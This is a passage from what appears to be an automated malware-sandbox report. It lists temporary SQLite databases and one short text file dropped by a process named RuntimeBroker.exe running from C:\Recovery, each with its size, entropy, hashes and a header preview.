                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\GNV18oqbC2

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\GhOeLhN1sH

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\HKnRc8XHjH

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\HSAjbyI6aw

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\HeaUdaWHCh

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\HmhCLkv5Kz

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):25
                                                                                                            Entropy (8bit):4.483856189774723
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:1tsATB2B:1tPt2B
                                                                                                            MD5:BFD739AED8DAA9823CEAB6C3EC0D3A3C
                                                                                                            SHA1:D0C23360153E2EB2E60A9B288184CA65E9887121
                                                                                                            SHA-256:1D74FC97B34A10D94EB26576156FA2F74A726BB8B1BB0CB1F291399DBD5571BA
                                                                                                            SHA-512:277E4D2C92006FB4F7362642D3DC6AACDFE130319524DED6AF69C66DACC0AAC52B463AFA9AEA7CEDD83843AB2011987917D0E962D6BCDC216E9FF1C1A46F3275
                                                                                                            Malicious:false
                                                                                                            Preview:6uuFHIrP92bQnE7wsVwWOlJSd

                                                                                                            C:\Users\user\AppData\Local\Temp\Hn7rYcx1ZG

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\HtQb0xmBnx

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\Iuw1difRUU

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\IvAUWiIdx7

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\JF6PppDecd

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\JmlD5RjN38

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\KKe0CU0tpx

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\KLkhMHbGp2

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\KMkj7FlQZr

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\KSmM1q7Lcz

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\KVCJaEG3iK

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\KVlMJQw8hg

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\LACsBxTQ82

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\LIkaMUWLQq

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\M8eXLBHyWF

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\MCPccexigN

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\MNshaDkjHu

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\MSixax1cLo

